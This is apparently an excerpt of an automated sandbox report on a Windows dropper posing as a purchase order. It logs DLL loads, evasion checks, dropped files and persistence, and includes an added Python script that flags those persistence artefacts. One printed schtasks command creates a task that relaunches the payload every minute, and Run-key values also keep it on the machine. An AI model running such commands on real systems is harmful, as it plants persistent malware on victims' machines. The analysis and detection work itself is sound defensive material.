                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeSection loaded: propsys.dll
                              Source: C:\Users\user\Desktop\Machine-PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: UAINOJ.lnk.2.drLNK file: ..\..\..\..\..\Windata\TCPKPY.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\zstTfPJ.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: Machine-PO.exeStatic file information: File size 2208256 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: Machine-PO.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x170a00
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_002620F6 LoadLibraryA,GetProcAddress,10_2_002620F6
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00227795 push ecx; ret 10_2_002277A8

Persistence and Installation Behavior

Source: C:\ProgramData\Synaptics\Synaptics.exe | File created: C:\Users\user\Documents\PIVFAGEAAV\~$cache1
Source: C:\Users\user\Desktop\Machine-PO.exe | File created: C:\ProgramData\Synaptics\RCX7868.tmp
Source: C:\Users\user\Desktop\Machine-PO.exe | File created: C:\ProgramData\Synaptics\Synaptics.exe
Source: C:\Users\user\Desktop\Machine-PO.exe | File created: C:\Users\user\Desktop\._cache_Machine-PO.exe
Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | File created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe

Boot Survival

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAINOJ.lnk
Source: C:\Users\user\Desktop\Machine-PO.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UAINOJ
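The Persistence and Installation Behavior and Boot Survival entries above describe three ways the dropped payloads survive a reboot: a scheduled task named UAINOJ.exe that fires every minute and runs TCPKPY.exe from AppData\Roaming, a Startup-folder shortcut whose target is stored as a relative path, and Run values under HKLM (WOW6432Node, named after a Synaptics driver) and HKCU. The Python below is an added triage example, not part of the Joe Sandbox report and not code from the sample: it parses a schtasks /create command line, scores it and Run-value events on the path and interval heuristics an analyst would apply, and resolves the shortcut's relative target to confirm it lands on the dropped TCPKPY.exe. The event records are constructed to mirror the report (plus two invented benign controls); the helper names, the user-writable directory list and the "task name ends in .exe" rule are this example's own assumptions.

```python
# Added example, not part of the Joe Sandbox report or of the sample: triage
# the persistence artefacts listed above from Sysmon-style event records.
# Helper names, the user-writable path list and the scoring heuristics are
# assumptions of this example, not Joe Sandbox or XRed terminology.
import ntpath
import re

# Directories a standard user can write to (the report's TCPKPY.exe and
# Synaptics.exe both live in one); an assumption of this example.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\",
                 "\\programdata\\", "\\users\\public\\", "\\temp\\")
PERIOD_UNITS = {"minute": 60, "hourly": 3600, "daily": 86400}  # schtasks /sc

# The Startup-folder shortcut in the report stores its target relatively.
STARTUP_DIR = (r"C:\Users\user\AppData\Roaming\Microsoft\Windows"
               r"\Start Menu\Programs\Startup")
LNK_RELATIVE_TARGET = r"..\..\..\..\..\Windata\TCPKPY.exe"

def _tokens(cmdline):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def parse_schtasks_create(cmdline):
    """Map '/opt' -> value (or True) for a 'schtasks /create' line, else None."""
    toks = _tokens(cmdline)
    if not toks or ntpath.basename(toks[0]).lower() not in ("schtasks", "schtasks.exe"):
        return None
    opts = {}
    for i in range(1, len(toks)):
        if toks[i].startswith("/"):
            nxt = toks[i + 1] if i + 1 < len(toks) else None
            opts[toks[i].lower()] = nxt if nxt and not nxt.startswith("/") else True
    return opts if "/create" in opts else None

def task_interval_seconds(opts):
    """Seconds between runs for /sc minute|hourly|daily [/mo N], else None."""
    unit = PERIOD_UNITS.get(str(opts.get("/sc", "")).lower())
    mo = opts.get("/mo", "1")
    if unit is None:
        return None
    return unit * (int(mo) if isinstance(mo, str) and mo.isdigit() else 1)

def _in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)

def is_suspicious_task(opts, max_interval=300):
    """Reasons a /create call looks like malware persistence (empty = clean)."""
    reasons = []
    if _in_user_writable(str(opts.get("/tr", ""))):
        reasons.append("action runs from a user-writable directory")
    interval = task_interval_seconds(opts)
    if interval is not None and interval <= max_interval:
        reasons.append(f"repeats every {interval}s")
    if str(opts.get("/tn", "")).lower().endswith(".exe"):  # heuristic assumption
        reasons.append("task name is an executable name")
    return reasons

def is_suspicious_run_value(event):
    """Reasons a Run-key value looks like persistence (empty = clean)."""
    if _in_user_writable(event["data"]):
        return ["Run value points into a user-writable directory"]
    return []

def resolve_startup_lnk(startup_dir, relative_target):
    """Resolve a relative .lnk target against the Startup folder it sits in."""
    return ntpath.normpath(ntpath.join(startup_dir, relative_target))

def triage(events):
    """Return [(label, reasons)] for every event that trips a heuristic."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            opts = parse_schtasks_create(ev["cmdline"])
            reasons = is_suspicious_task(opts) if opts else []
            label = str(opts.get("/tn")) if opts else ""
        elif ev["type"] == "registry" and ev["key"].lower().endswith("\\run"):
            reasons, label = is_suspicious_run_value(ev), ev["name"]
        else:
            continue
        if reasons:
            hits.append((label, reasons))
    return hits

# Constructed events: the first three mirror the report, the last two are
# invented benign-looking controls.
EVENTS = [
    {"type": "process", "cmdline": r"schtasks /create /tn UAINOJ.exe "
     r"/tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run",
     "name": "Synaptics Pointing Device Driver", "data": r"C:\ProgramData\Synaptics\Synaptics.exe"},
    {"type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "name": "UAINOJ", "data": r"C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"},
    {"type": "process", "cmdline": r'schtasks /create /tn "Vendor Update" '
     r'/tr "C:\Program Files\Vendor\Update.exe" /sc daily'},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "name": "SecurityHealth", "data": r"C:\Windows\system32\SecurityHealthSystray.exe"},
]

if __name__ == "__main__":
    for label, reasons in triage(EVENTS):
        print(f"{label}: {'; '.join(reasons)}")
    print("Startup .lnk resolves to", resolve_startup_lnk(STARTUP_DIR, LNK_RELATIVE_TARGET))
```

Run as a script it prints the three flagged entries from the report and the resolved shortcut target; on a live host the same functions can be fed from Sysmon event ID 1 (process creation) and ID 13 (registry value set) records. The one-minute repeat interval is the strongest of the three task signals: a legitimate updater rarely needs to relaunch its binary sixty times an hour, while the user-writable path check on its own would also catch per-user installers.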

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2112).png
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_0021F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_0021F78E
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00267F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_00267F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 10_2_00221E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_00221E5A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | Window / User API: threadDelayed 5414
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | Window / User API: foregroundWindowGot 1618
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_10-103511
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | API coverage: 3.7 %
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exe TID: 1756 | Thread sleep time: -54140s >= -30000s
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 1076 | Thread sleep time: -1560000s >= -30000s
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 7748 | Thread sleep time: -60000s >= -30000s
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | Last function: Thread delayed
                              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                              Source: C:\Windows\splwow64.exe | Last function: Thread delayed
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | Thread sleep count: Count: 5414 delay: -10
                              Source: Yara match | File source: 00000007.00000002.2753117932.0000000002C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: 00000007.00000002.2754697002.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match | File source: Process Memory Space: wscript.exe PID: 756, type: MEMORYSTR
                              Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, type: DROPPED
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00252044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00252044
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0025219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0025219F
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_002524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_002524A9
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00246B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,10_2_00246B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00246E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,10_2_00246E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0024F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0024F350
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0024FD47 FindFirstFileW,FindClose,10_2_0024FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0021DD92 GetFileAttributesW,FindFirstFileW,FindClose,10_2_0021DD92
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0024FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0024FDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0021E47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_0021E47B
                              Source: C:\ProgramData\Synaptics\Synaptics.exe | Thread delayed: delay time: 60000
                              Source: C:\Windows\splwow64.exe | Thread delayed: delay time: 120000
                              Source: C:\Users\user\Desktop\Machine-PO.exe | File opened: C:\Users\user
                              Source: C:\Users\user\Desktop\Machine-PO.exe | File opened: C:\Users\user\AppData
                              Source: C:\Users\user\Desktop\Machine-PO.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                              Source: C:\Users\user\Desktop\Machine-PO.exe | File opened: C:\Users\user\AppData\Roaming
                              Source: C:\Users\user\Desktop\Machine-PO.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                              Source: C:\Users\user\Desktop\Machine-PO.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                              Source: Machine-PO.exe, 00000000.00000003.1497644729.00000000007F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: Machine-PO.exe, 00000000.00000003.1497644729.00000000007F5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1816797943.000000000077A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                              Source: Synaptics.exe, 00000003.00000002.1816797943.00000000007D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWL
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exe | Process information queried: ProcessInformation
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0025703C BlockInput,10_2_0025703C
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0020374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,10_2_0020374E
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_002346D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,10_2_002346D0
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_002620F6 LoadLibraryA,GetProcAddress,10_2_002620F6
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0022A937 GetProcessHeap,10_2_0022A937
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00228E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00228E3C
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_00228E19 SetUnhandledExceptionFilter,10_2_00228E19
                              Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe | Code function: 10_2_0023BE95 LogonUserW,10_2_0023BE95
